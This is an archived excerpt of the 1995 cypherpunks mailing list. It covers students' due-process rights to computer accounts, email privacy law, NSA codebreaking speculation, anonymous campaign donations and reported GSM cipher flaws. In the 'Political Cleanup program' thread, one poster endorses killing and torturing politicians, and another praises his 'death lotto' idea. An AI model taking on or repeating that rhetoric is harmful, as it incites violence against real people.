went on to say that "the Due Process Clause also forbids arbitrary deprivations of liberty. 'Where a person's good name, reputation, honor or integrity is at stake because of what the government is doing to him,' the minimal requirements of the Clause must be satisfied." So what are a university student's property rights? "The Fourteenth Amendment requires due process before a governmental entity, such as a public institution, may deprive one of life, liberty, or property. In a college setting, a student's good name and reputation are considered a 'liberty' right, and a student's right to attend college is considered a 'property' right. Due process would be required before a student is deprived of either at a public institution." [_A Practical Guide to Legal Issues Affecting College Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D. Gehring. (College Administration Publication, 1985).] So is a student's computer access a property right? I'd say it depends. On one extreme, I'm confident a student has a property right in account financed via the student computer or engineering fee. On the other extreme, if a professor informally gave a student an account on that professor's personal workstation, the professor could probably remove that access without due process. So what about department accounts? In the departments I know of, accounts are given to any students who meet some set of requirements. I think this makes them an entitlement for the students who qualify and hence some modicum of due process is necessary. ANNOTATED REFERENCES (All these documents are available on-line. Access information follows.) ================= faq/due-process ================= * Due Process q: Should users be suspended from the computer pending formal discipline? a: No, with one exception. Just as students should not be expelled ... ================= academic/student.freedoms.aaup ================= * Student Freedoms (AAUP) Joint Statement on Rights and Freedoms of Students -- This is the main U.S. statement on student academic freedom. ================= law/goss-v-lopez.mnookin ================= * Due Process -- When Required -- Goss v. Lopez -- Mnookin Comments from _In the Interest of Children_, R. Mnookin (Ed.), Franklin E. Zimring and Rayman L. Solomon (Contrib. Authors). It reports that the Supreme Court says that some modicum of due process is necessary unless the matter is trivial or there is an emergency. ================= law/goss-v-lopez.fischer ================= * Due Process -- When Required -- Goss v. Lopez -- Fischer Comments from _Teacher's and the Law_, 3rd edition, by Louis Fischer, et al. Published in 1991 by Longman. It reports that the Supreme Court says that some modicum of due process is necessary unless the matter is trivial or there is an emergency. ================= law/constraints.constitutional ================= * Constitution -- Public University -- Constraints Comments from _A Practical Guide to Legal Issues Affecting College Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D. Gehring. (College Administration Publication, 1985). Discusses the constitutional constraints on public universities including the requires for freedom of expression, freedom against unreasonable searches and seizures, due process, specific rules. ================= ================= If you have gopher, you can browse the CAF archive with the command gopher gopher.eff.org These document(s) are also available by anonymous ftp (the preferred method) and by email. To get the file(s) via ftp, do an anonymous ftp to ftp.eff.org, and then: cd /pub/CAF/faq get due-process cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/law get goss-v-lopez.mnookin cd /pub/CAF/law get goss-v-lopez.fischer cd /pub/CAF/law get constraints.constitutional To get the file(s) by email, send email to ftpmail at decwrl.dec.com Include the line(s): connect ftp.eff.org cd /pub/CAF/faq get due-process cd /pub/CAF/academic get student.freedoms.aaup cd /pub/CAF/law get goss-v-lopez.mnookin cd /pub/CAF/law get goss-v-lopez.fischer cd /pub/CAF/law get constraints.constitutional -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.2 iQCVAwUBMNRs8zokqlyVGmCFAQGgRwP/e2fqRuiVrDWGWuYAnq1IQhUlhULSPlGY f8/2+N2/VqblVFsXyOBDA6YgwzTiFgiljOVFo2Bxw3RYyBDxWxr6yDS7BxGf7Zdp QjhIPP7fAk6wNKu3ACwtq3iap9BsOGcZlF2fGrP3B0jsDQtFxosGMNUiPH8HPs5Z l1QTiAyZ8yw= =F7PT -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ Finger for Geek Code Info <=> Finger for PGP Public Key \/ / -=-=-=-=-=- -=-=-=-=-=- \/ http://krypton.mankato.msus.edu/~hayden/Welcome.html -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+ K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+** ------END GEEK CODE BLOCK------ From declan+ at CMU.EDU Sun Dec 17 17:45:21 1995 From: declan+ at CMU.EDU (Declan B. McCullagh) Date: Mon, 18 Dec 1995 09:45:21 +0800 Subject: Is ths legal?... In-Reply-To: <2.2b7.32.19951217205443.008a13f0@mail.teleport.com> Message-ID: Excerpts from internet.cypherpunks: 17-Dec-95 Re: Is ths legal?... by Alan Olsen at teleport.com > In looking at their homepage, it appears to be a state funded school. > (There is not alot of background on the school history or affiliations on > their homepage except for a note that it was founded by the territorial > legislature a number of years before becoming a state..) My understanding is that it is a state school. But for state action to be present, there has to be a significant interdependent relationship constituting a nexus of state action between the state and the university. Like administrators being appointed by agents of the state government. State funding by itself is not sufficient. If that were true, CMU -- which receives almost half its revenue from the government -- would have to behave reasonably. (It doesn't; check out http://joc.mit.edu/~joc/cmu.html) -Declan (not a lawyer) From prf at teleport.com Sun Dec 17 17:56:03 1995 From: prf at teleport.com (Paul Farago) Date: Mon, 18 Dec 1995 09:56:03 +0800 Subject: 2 websites Message-ID: Interested in Term Limits? See http://www.termlimits.org Grass Roots Research's "Portrait of America" at http://www.grr.com Paul R. Farago, Portland OR From anonymous-remailer at shell.portal.com Sun Dec 17 18:07:09 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 18 Dec 1995 10:07:09 +0800 Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT" Message-ID: <199512172339.PAA05833@jobe.shell.portal.com> On Fri, 15 Dec 1995 anonymous-remailer at shell.portal.com wrote: > On Fri, 15 Dec 1995, Alice de 'nonymous wrote: > > > Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000 > > from Netscape for finding the HUGE security flaws in Netscape's existing > > product line?? > > > > Alice de 'nonymous ... > ^^^^^^^^^^^^^^^^^^^^^^^^ > > Heh, hey Alice, you know this discussion a short time ago where you > claimed that you wouldn't use PGP for signing because it wasn't secure > or something, what's with the use of the penet address? Uhhm, actually, I said that I don't have a secure machine to run PGP on, and that I didn't feel that I should have to travel across town to use a secure machine to ask whether or not Ian Goldberg and or David Wagner got any moola from Netscape or AT&T for helping to make these companies a fortune. Did they get their $25,000, or a scholarship, or a Christmas week or two at the Halekulani in Honolulu?? They helped out these companies, and here it is, less than ten days to Christmas, and what have these companies done?? Nothing ... nothing at all ... but freeload ... > Surely a penet address offers even less protection for your id? > > Or have you done something nifty like create the penet address with a > nymserver address? Yep, something like that ... you must be paying attention, my friendly "spoofing" shadow. The Penet address is simply to prevent huge email from being mailed to me. I don't want AT&T or Netscape to mailbomb me for simply writing the truth about them. Penet gives me some protection. I'm not looking to Penet to protect my "identity". All I want Penet to do is provide a way for people to write to me if they want to. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From anon-remailer at utopia.hacktic.nl Sun Dec 17 18:07:16 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 18 Dec 1995 10:07:16 +0800 Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: <199512172232.RAA13063@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- O.K. I'm new... however... I remember reading an article about this news release in mid '94 (I believe it was the NY Times), about the time that Cray Computer Company (Seymour's unsuccessful spinoff company) was actively seeking bank financing. Anyone remember? The article was about an NSA contract award to Cray Computer. In some background: The Supercomputer industry had been struggling for a while with reductions in purchases from the U.S. government due to cutbacks on research spending and the 'end of the cold war'. The situation at MasPar had gotten to the point of court reorginization or worse. In June (of '94) Cray was in such a cash squeeze that it took out a $17.5 million secured loan to fend collapse. During July, Cray announced that it was seeking a "partner" to make an investment in exchange for technology access. Guess who shows up with plans to build "the ultimate spying machine"? Now, Seymour's a nice guy, but money is tight, so he buys in on the hopes for more a lucrative future relationship. The plot thickens. The contract calls for Cray to put up $4.6 million to cover the initial development (didn't they just take out a loan?) of which about $400,000 will go to the NSA for so called "software consulting services". It makes one wonder what the "real" contract was worth (such as producing this surveillance system in quantity)? There was some speculation in the article about what this system could be used for, such as DEA operations outside U.S. borders (Columbia perhaps) or foreign military communication or enhancement processing of spy satellite photos. What caught my attention was the architecture. A "hybrid design linking two supercomputer processors with an array of HALF A MILLION inexpensive processors" that were designed by the U.S. government laboratory affiliated with the NSA. The same chip house that brought us Clipper. I've not kept up with the "ultimate" demise that eventually befell Cray Computer Company, but the October 16 FBI filing on capacity for Digital Telephony got me thinking back to this article. 1% seems like a rather huge need for horsepower. And what if GAK doesn't fly? And the widespread use of hard crypto just keeps increasing? This kind of machine could, in theory: 1) Implement ALL Clipper(II) based Key Escrow functionality in silicon (the easy part) AND allow for simultaneous decrypt and surveil of 'who knows how many' Clipper based data streams. 2) Implement general RSA based Prime Factoring functionality in silicon (the not so easy part) AND allow massively parallel decrypt and surveil of 'who knows how many' RSA/etc. based data streams. 3) Implement it all, AND 'on-line' transaction based surveillance via the FBI's 1% capacity infrastructure. Chilling... Who needs key escrow (or RSA private keys) when you've got a massively parallel prime factoring machine. What if GAK was to become a 'non-issue'? How fast do you think a machine such as this could factor RSA 129? Makes you wonder if 2048 bits will be enough (my guess.. it won't). But then, I'm sure that when Cray Computer finally folded (has/hasn't?) all that tech just got sold for scrap eh? Anitro - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMNSadioZzwIn1bdtAQEgYwF+Nf5Azpeore6OPMNU94CpCawxPcPg8g7T kLQDY9I5Upk7vCe1dCpHm14g8jRYdSDx =vjJA -----END PGP SIGNATURE----- From unicorn at schloss.li Sun Dec 17 18:20:39 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 18 Dec 1995 10:20:39 +0800 Subject: Is ths legal?... In-Reply-To: Message-ID: On Sun, 17 Dec 1995, Declan B. McCullagh wrote: > Excerpts from internet.cypherpunks: 17-Dec-95 Re: Is ths legal?... by > Alan Olsen at teleport.com > > In looking at their homepage, it appears to be a state funded school. > > (There is not alot of background on the school history or affiliations on > > their homepage except for a note that it was founded by the territorial > > legislature a number of years before becoming a state..) > > My understanding is that it is a state school. But for state action to > be present, there has to be a significant interdependent relationship > constituting a nexus of state action between the state and the > university. Like administrators being appointed by agents of the state > government. > > State funding by itself is not sufficient. If that were true, CMU -- > which receives almost half its revenue from the government -- would have > to behave reasonably. (It doesn't; check out > http://joc.mit.edu/~joc/cmu.html) > > -Declan > (not a lawyer) Obviously. > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From sethf at MIT.EDU Sun Dec 17 18:23:30 1995 From: sethf at MIT.EDU (sethf at MIT.EDU) Date: Mon, 18 Dec 1995 10:23:30 +0800 Subject: Oklahoma University: Is this legal?... Message-ID: <9512180009.AA18900@frumious-bandersnatch.MIT.EDU> Going on my past experiences with this sort of situation, I think the problem is a) Oklahoma University is public (seems true from http://www.uoknor.edu/) b) The state of Oklahoma has an "open public records" law so c) someone decided that everything stored on the University's computer system was therefore a "public record" (since the computer is "owned" by the public), and thus had to be accessible by law. This seems to be approximately what's going on: "Drafted by Associate Chief Counsel Kurt Ockershauser a year ago, the policy will make a legal statement that e-mail is running on state property, Colaw said. He said the policy is not an invasion of privacy." http://www.uoknor.edu/okdaily/issues/fall1995/dec-7/1-email.processed.html Someone needs to explain to him that what he is doing is not legally required, and perhaps violates the ECPA. ================ Seth Finkelstein sethf at mit.edu From stevenw at best.com Sun Dec 17 18:28:00 1995 From: stevenw at best.com (Steven Weller) Date: Mon, 18 Dec 1995 10:28:00 +0800 Subject: [NOISE] Screening of Unauthorized Access Message-ID: Saw this in the net. I know nothing about the movie personally. Perhaps someone on the list can comment? >Unauthorized Access, the documentary on the computer hacker underground from >an insiders point of view is screening in San Francisco!!! > >What the critics say: > >"Unauthorized Access lets you see and hear from those people that big >corporations and the government are so afraid of..." - The Seattle Stranger > >"If you want to know what a hacker really is, this is a must" - EXE Magazine > >"To see the hacking world from the Inside, try watching Unauthorized Access... >it shows hackers as they see themselves without the media's usual hype..." - >The New Scientist > >"As a cultural piece, it's what we've been waiting for. Many of us have long >suspected that modern-day hackers have a unique and rich culture. >Unauthorized Acess is something we can point to to prove it." - 2600 - The >Hacker Quarterly > >"Annaliza Savage has made a fascinating documentary about the sick world of >criminal hacking..." Mich Kabay - NCSA > >"It's a kafka-esque expose of the computer underground, a must see for all >security experts. This made me want to go out and become a cop." - Cult of >the Dead Cow > >Question and Answer session after the screening.... > >Unauthorized Access is screening at: >Artists Television Access in San Francisco >Thursday, December 21, 1995 - 8:30 pm >922 Valencia Street (at 21st) SF, CA 94110 >(415) 824 3890 > >For more info on Unauthorized Access http://bianca.com/bump/ua/ ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more | than just a place to find pictures | of people having sex with dogs." stevenw at best.com | -- Time Magazine, 3 July 1995 From gary at kampai.euronet.nl Sun Dec 17 18:29:29 1995 From: gary at kampai.euronet.nl (Gary Howland) Date: Mon, 18 Dec 1995 10:29:29 +0800 Subject: BosniaLINK Message-ID: <199512172151.QAA12926@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- [ Irrelevant crap deleted ] Don't post irrelevant stuff here. I've noticed an awful lot of crap posted from the replay remailer to this group over the last few months. Wish I could figure out who this jerk is. Gary - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMNSQ+CoZzwIn1bdtAQHrHQF8DyOXYfMYV5czKkMXDqJtMYWaReg1IYiX QSG801r5LE3hMDa7ooSrQH6LwgDwPAYs =r8dB -----END PGP SIGNATURE----- From ses at tipper.oit.unc.edu Sun Dec 17 18:30:51 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 18 Dec 1995 10:30:51 +0800 Subject: Is ths legal?... In-Reply-To: Message-ID: On Sun, 17 Dec 1995, Declan B. McCullagh wrote: > State funding by itself is not sufficient. If that were true, CMU -- > which receives almost half its revenue from the government -- would have > to behave reasonably. (It doesn't; check out > http://joc.mit.edu/~joc/cmu.html) There is some precedent for Federal funding being used to influence the behaviour of universities - most notably with anti-discrimination. I don't think federal contracts affect this particular area. Simon From vznuri at netcom.com Sun Dec 17 18:34:03 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Mon, 18 Dec 1995 10:34:03 +0800 Subject: Political Cleanup program In-Reply-To: Message-ID: <199512172204.OAA22202@netcom23.netcom.com> JB: >Politics is traditionally corrupt, it appears, because donors to politicians >and political campaigns expect a quid pro quo for their donations. Various >unsatisfactory solutions include campaign spending limits, etc. I have an unusual view that I've never seen elsewhere: the problem with our government is not that money or PACs are involved, but that the system does not handle or resolve the conflicts between them very well. in other words, in contrary to the current view that all PACs are evil, I think the problem is not that we have PACs, but that our current system does not balance their demands in some sensible manner. the system is susceptible to corruption. it is conceivable however that there would be a system that involves money and politics but still avoids corruption. there seem to be a lot of people who suggest that merely because politics involves money, it is therefore corrupt. this is an awfully vague and nebulous line of thinking in my view. are we to suppose that any industry that involves money (all of them, of course) inevitably moves in the direction of corruption? perhaps some more "cynicalpunks" may have this view, but I don't share it. >It occurs to me that it would be a major advance if a system could be set up >that would "blind" campaign donations as to their source: The donor could >be satisfied that his donation gets to the candidate or cause, but the >candidate couldn't know who actually paid the money (and the donor would be >unable to prove that he made a donation, for example). Admittedly there are >a lot of details that need to be worked out, but if this could be >accomplished it would change politics as we know it. what you describe would allow anonymous bribes. the giver could always identify his cash donation "out of band" to the receiver. moreover, other observers would not be aware of the relationship. why do you think this would be an improvement? to the contrary our current system works hard to require the disclosure of who donated what to a candidate, so the candidate's potential hidden agendas and ulterior motives can be revealed. seems reasonable to me. you are probably barking up the wrong tree here on cypherpunks, however, because most of the key "insiders" here are convinced that democracy is a proven failure, and that in fact government is invariably corrupt and oppressive, no matter what the implementation. the "solutions" advocated here are chiefly withdrawal and subterfuge. needless to say I disagree with this. I wonder if some day someone will invent a "killer app" that doubles as a political governing system. it seems to me politics is one of the last most intractable areas of human interaction when many others have been harmonized and systematized by the information revolution. I suspect it will eventually succumb to technological ingenuity as well. the end result would be a government that is not perfect, but is at least as good as the population that drives it, and no worse. (in contrast today we seem to have a government that is no better than the least common denominator). JB, I have to wonder however how your ideas about campaign reform tie into your prior advocation of political assinations as a legitimate form of citizen power. have you given up on the idea of murdering politicians as a means of political reform? or are you now just coupling that idea with campaign reform to put some new bells and whistles on your overall ideological package? From RDHeffren at gnn.com Sun Dec 17 18:45:02 1995 From: RDHeffren at gnn.com (Robert) Date: Mon, 18 Dec 1995 10:45:02 +0800 Subject: Is ths legal?.. (fwd) Message-ID: <199512172313.SAA25145@mail-e1b.gnn.com> Sun, 17 Dec 1995 10:18:50 -0500 (EST) Black Unicorn writes: > > On Sun, 17 Dec 1995, Jay Holovacs wrote: > > Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510 > > et seq.). "It shall not be unlawful under this chapter for an > > operator of a switchboard, or an officer, employee, or agent of a > > provider of wire *or electronic* communication service, whose > > facilities are used in the trans-mission of a wire communication, > I disagree. Instead it implies that interception and administrative > review of content will be tolerated where it is "a necessary > incident to the rendition of his service or to the protection of the > rights or property of the provider of that service." Note that it > will be the provider who makes the definition in the ex ante application. > Even worse, the protection that is given is for "a provider of wire > communication service to the public." I also disagree because I would interpret it as "It shall not be unlawful...to intercept, disclose or use that communication...except by utilizing *service observing* or *random monitoring*." That indicates to me that specific monitoring is fine, but random monitoring must be used for quality control. And how do you become specific without being random? QC could be whatever the providers deem it to be, the public be damned. "..anything not specifically allowed is expressly forbidden..." RDHeffren at gnn.com RobertH677 at aol.com id=0x95AA98CD From jimbell at pacifier.com Sun Dec 17 21:07:44 1995 From: jimbell at pacifier.com (jim bell) Date: Mon, 18 Dec 1995 13:07:44 +0800 Subject: Political Cleanup program Message-ID: At 02:04 PM 12/17/95 -0800, Detweiler wrote: > >JB: >>Politics is traditionally corrupt, it appears, because donors to politicians >>and political campaigns expect a quid pro quo for their donations. Various >>unsatisfactory solutions include campaign spending limits, etc. > >I have an unusual view that I've never seen elsewhere: the problem with >our government is not that money or PACs are involved, but that the system >does not handle or resolve the conflicts between them very well. in other >words, in contrary to the current view that all PACs are evil, I think the >problem is not that we have PACs, but that our current system does not >balance their demands in some sensible manner. the system is >susceptible to corruption. it is conceivable however that there would be >a system that involves money and politics but still avoids corruption. Here's a question I have never heard anyone else ask (or answer!). "What is the purpose of a PAC? To be more specific, a PAC simply seems to be a funnel through which individual donations flow; why do we need a PAC? Is it to keep records of "who's naughty and nice"? Any contribution that can be made by a PAC could just as easily be made by one individual. >>It occurs to me that it would be a major advance if a system could be set up >>that would "blind" campaign donations as to their source: The donor could >>be satisfied that his donation gets to the candidate or cause, but the >>candidate couldn't know who actually paid the money (and the donor would be >>unable to prove that he made a donation, for example). Admittedly there are >>a lot of details that need to be worked out, but if this could be >>accomplished it would change politics as we know it. > >what you describe would allow anonymous bribes. Which, I suggest, is better than a non-anonymous bribe. > the giver could always "always"? Are you sure about that? >identify his cash donation "out of band" to the receiver. It is exactly this that the system I'd propose would prevent. I realize that you may not be able to imagine such a system, but that doesn't mean that such a system could be designed. (Before 1975, most of us would not have been able to imagine public-key encryption, for example.) A giver could CLAIM to make any sort of donation at all; but if the system were properly designed he could simply be lying to the officeholder. > moreover, other observers >would not be aware of the relationship. Not IMMEDIATELY, perhaps, but eventually the books could be opened, perhaps as much as years later. (Let's say, 3 months before the end of the term of the politician. And the amounts donated could withheld, with only the total donated reported every 3 months or so. (And perhaps only to 1 or 2 significant digits of accuracy.) For example, a Senator will be told on January 1, 1996, that up until that point he's received "about" $1.4 million dollars of donations. He would not be able to link these donations with any particular claim. Somebody could claim to have given him "$2000" of donation, which wouldn't even show up to the accuracy of the amount told the politician. Further techniques could be used to disguise the rate of giving. >why do you think this would be an improvement? Easy. It would remove much of the reason for a politician to treat one citizen differently from another citizen. >to the contrary our current system works hard to require >the disclosure of who donated what to a candidate, so the candidate's potential >hidden agendas and ulterior motives can be revealed. seems reasonable to >me. _EVENTUAL_ public disclosure of such information is not inconsistent with my idea. >you are probably barking up the wrong tree here on cypherpunks, however, >because most of the key "insiders" here are convinced that democracy is >a proven failure, and that in fact government is invariably corrupt and >oppressive, no matter what the implementation. the "solutions" advocated >here are chiefly withdrawal and subterfuge. I don't disagree with that assessment. However, that does not mean that I don't want to make life as difficult for the politicians as possible until they are swinging from a rope. >needless to say I disagree with this. I wonder if some day someone will >invent a "killer app" that doubles as a political governing system. >it seems to me politics is one of the last most intractable areas of >human interaction when many others have been harmonized and systematized >by the information revolution. I suspect it will eventually succumb to >technological ingenuity as well. the end result would be a government >that is not perfect, but is at least as good as the population that >drives it, and no worse. (in contrast today we seem to have a government >that is no better than the least common denominator). > > >JB, I have to wonder however how your ideas about campaign reform tie into >your prior advocation "Prior"? It's not "prior." I haven't changed my previous position one bit. > of political assinations as a legitimate form of >citizen power. have you given up on the idea of murdering politicians as >a means of political reform? Not "political reform." Political ELIMINATION. I want to eliminate the entire concept of a heirarchial government. > or are you now just coupling that idea with >campaign reform to put some new bells and whistles on >your overall ideological package? I repeat my previous statement. I'm happy to see them squirm before they are led to the gallows. Making life as difficult as possible for them is my goal. Using technology to disable their normal methods of corruption would be an excellent start. From ses at tipper.oit.unc.edu Sun Dec 17 21:20:06 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Mon, 18 Dec 1995 13:20:06 +0800 Subject: Political Cleanup program In-Reply-To: Message-ID: On Sun, 17 Dec 1995, jim bell wrote: > > It occurs to me that it would be a major advance if a system could be set up > that would "blind" campaign donations as to their source: The donor could > be satisfied that his donation gets to the candidate or cause, but the > candidate couldn't know who actually paid the money (and the donor would be > unable to prove that he made a donation, for example). Admittedly there are > a lot of details that need to be worked out, but if this could be > accomplished it would change politics as we know it. Just a straight Chaumian style blinding won't work, as there are too many covert channels available via both timing and amounts; For example, Joe Random Capitalist-Oppressor could arrange to pay a series of relatively small amounts wth different values in the cents field which could be used to confirm their payment (e.g. they could be composed to form a digitally signed value of some kind ("pollution rools" or "lung cancer is kool") :) Sen. Dianne Running-Dog could then look for a matching set of donations and confirm that the bribe had in fact been paid. There are much better ways of reforming the political system -the formation of proper political parties with real programmes (the one good thing about the newtoid surge); changing the rules for TV advertising, etc. Blinding just makes things worse. Simon // Introducing Covert Chunnels- the british side has a really slow rate, and the french won't let there citizens use their side.. From jimbell at pacifier.com Sun Dec 17 21:26:14 1995 From: jimbell at pacifier.com (jim bell) Date: Mon, 18 Dec 1995 13:26:14 +0800 Subject: Political Cleanup program Message-ID: Well, I don't consider these two ideas mutually exclusive. As I pointed out to Detweiler (under his alias "Nuri") I'm happy to see the politicians tortured before they are killed. At 02:48 PM 12/17/95 -0800, you wrote: >Good ideas, but you're getting soft. I liked the death lotto much better. > > Mike > >> Politics is traditionally corrupt, it appears, because donors to politicians >> and political campaigns expect a quid pro quo for their donations. Various >> unsatisfactory solutions include campaign spending limits, etc. >> >> It occurs to me that it would be a major advance if a system could be set up >> that would "blind" campaign donations as to their source: The donor could >> be satisfied that his donation gets to the candidate or cause, but the >> candidate couldn't know who actually paid the money (and the donor would be >> unable to prove that he made a donation, for example). Admittedly there are >> a lot of details that need to be worked out, but if this could be >> accomplished it would change politics as we know it. > > From wlkngowl at unix.asb.com Sun Dec 17 22:01:25 1995 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Mon, 18 Dec 1995 14:01:25 +0800 Subject: Encrypted telnet... Message-ID: <199512180438.XAA08244@UNiX.asb.com> On Fri, 15 Dec 95 12:48:41 CST, you wrote: An alternative to writing an entirely new proggie might be to write an add-on DLL for Windoze telnet clients that support add-ons... EWAN comes to mind here. >I am looking for an encrypted telnet (or rlogin/etc) package >that supports a Windoze client. >It looks like all the normal ones that I can find >(SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids. >Don't get me wrong - I would prefer to use Unix, but I am >headed off to locations, where I know all I'll have access to >is Windows, with a PPP stack to some ISP. >I'ld write it myself, - pasteing different packages together, >but I need it working in a day or two. Can anyone help me here? >Thanks, >Dan >------------------------------------------------------------------ >Dan Oelke Alcatel Network Systems >droelke at aud.alcatel.com Richardson, TX From rsalz at osf.org Sun Dec 17 22:12:08 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 18 Dec 1995 14:12:08 +0800 Subject: IETF draft on data protection via crypto API Message-ID: <9512180438.AA02976@sulphur.osf.org> A Revised Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Common Authentication Technology Working Group of the IETF. Title : Independent Data Unit Protection Generic Security Service Application Program Interface (IDUP-GSS-API) Author(s) : C. Adams Filename : draft-ietf-cat-idup-gss-03.txt Pages : 35 Date : 12/14/1995 The IDUP-GSS-API extends the GSS-API [RFC-1508] for applications requiring protection of a generic data unit (such as a file or message) in a way which is independent of the protection of any other data unit and independent of any concurrent contact with designated "receivers" of the data unit. Thus, it is suitable for applications such as secure electronic mail where data needs to be protected without any on-line connection with the intended recipient(s) of that data. Subsequent to being protected, the data unit can be transferred to the recipient(s) - or to an archive - perhaps to be processed ("unprotected") only days or years later. Internet-Drafts are available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-cat-idup-gss-03.txt". A URL for the Internet-Draft is: ftp://ds.internic.net/internet-drafts/draft-ietf-cat-idup-gss-03.txt Internet-Drafts directories are located at: o Africa Address: ftp.is.co.za (196.4.160.8) o Europe Address: nic.nordu.net (192.36.148.17) Address: ftp.nis.garr.it (192.12.192.10) o Pacific Rim Address: munnari.oz.au (128.250.1.21) o US East Coast Address: ds.internic.net (198.49.45.10) o US West Coast Address: ftp.isi.edu (128.9.0.32) Internet-Drafts are also available by mail. Send a message to: mailserv at ds.internic.net. In the body type: "FILE /internet-drafts/draft-ietf-cat-idup-gss-03.txt". NOTE: The mail server at ds.internic.net can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e., documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. For questions, please mail to Internet-Drafts at cnri.reston.va.us. From ylo at cs.hut.fi Sun Dec 17 22:35:04 1995 From: ylo at cs.hut.fi (Tatu Ylonen) Date: Mon, 18 Dec 1995 14:35:04 +0800 Subject: Motorola Secure Phone In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net> Message-ID: <199512171141.NAA02997@trance.olari.clinet.fi> > What about cellular phones, especially GSM? As I have heard GSM is > supposed to be secure, at least thats what the salespersons tell every > time they are selling a GSM. > > I know ciphering algorithms A3, A8 and A5 are used in GSM phones, but I > know nothing more about them. I got the following from mjos at math.jyu.fi a couple of months ago. Unfortunately I was unable to attend or listen on mbone. Does anyone know more about this? > University of Cambridge Computer Laboratory > > SEMINAR SERIES > > > 10th October Bill Chambers, King's College, London > PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK > CONTROL > > .. > GSM:n salausalgoritmi on juuri tuota tyyppi�. Chambers yritti pit�� tuota > nimenomaista esitelm�� jo yli vuosi sitten, mutta silloin viralliset tahot > puuttuivat asiaan ja esitys peruttiin. H�n on l�yt�nyt algoritmista aukkoja, > joiden avulla purkuaika saadaan eritt�in lyhyeksi. > > ps. ne meist�, jotka p��sev�t mboneen k�siksi, voivat seurata tapahtumia > liven� :) [Free translation: The GSM encryption algorithm is of exactly that type. Chambers tried to have this particular presentation over an year ago, but at that time the official side interfered and the presentation was cancelled. He has found holes in the algorithm that can be used to make decryption (without key) very quick. PS. Those of us who can get access to mbone, can follow it live.] Tatu From jim at acm.org Sun Dec 17 23:32:02 1995 From: jim at acm.org (Jim Gillogly) Date: Mon, 18 Dec 1995 15:32:02 +0800 Subject: What ever happened to... Cray Comp/NSA co-development In-Reply-To: Message-ID: <199512180550.VAA13167@mycroft.rand.org> Correction of one detail: > tcmay at got.net (Timothy C. May) writes: > When you've done this, and concluded that RSA-129 could be done in, say, X > minutes, then move on to RSA-384 (the BlackNet key cracked by the MIT > group), and on to the 1024- and 2048-bit keys. Tell us how many years or > centuries it will take. (Hint: Rivest and Schneier have done these The BlackNet key break didn't have any MIT involvement: it was done by Paul Leyland of Oxford, Arjen Lenstra of Bellcore, Alec Muffet of Sun UK, and Jim Gillogly of Cypherpunks, RAND, and Gillogly Software in no particular order. Jim Gillogly Trewesday, 28 Foreyule S.R. 1995, 05:49 From gbroiles at darkwing.uoregon.edu Sun Dec 17 23:32:16 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Mon, 18 Dec 1995 15:32:16 +0800 Subject: Political Cleanup program Message-ID: <199512180553.VAA12388@darkwing.uoregon.edu> At 07:35 PM 12/17/95 -0800, you wrote: >Here's a question I have never heard anyone else ask (or answer!). "What is >the purpose of a PAC? > >To be more specific, a PAC simply seems to be a funnel through which >individual donations flow; why do we need a PAC? Is it to keep records of >"who's naughty and nice"? Any contribution that can be made by a PAC could >just as easily be made by one individual. PACs are to politics what mutual funds are to investing - that is, a mechanism for investors to diversify their holdings, and to allow for the managers of those holdings to use their expert/specialized knowledge to achieve better returns (at the cost of some frictional skimmings-off) than individuals would on their own. But I'm not sure what this has to do with C-punks any longer. -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | gbroiles at netbox.com every temptation, every desire, every inhibition." | -- 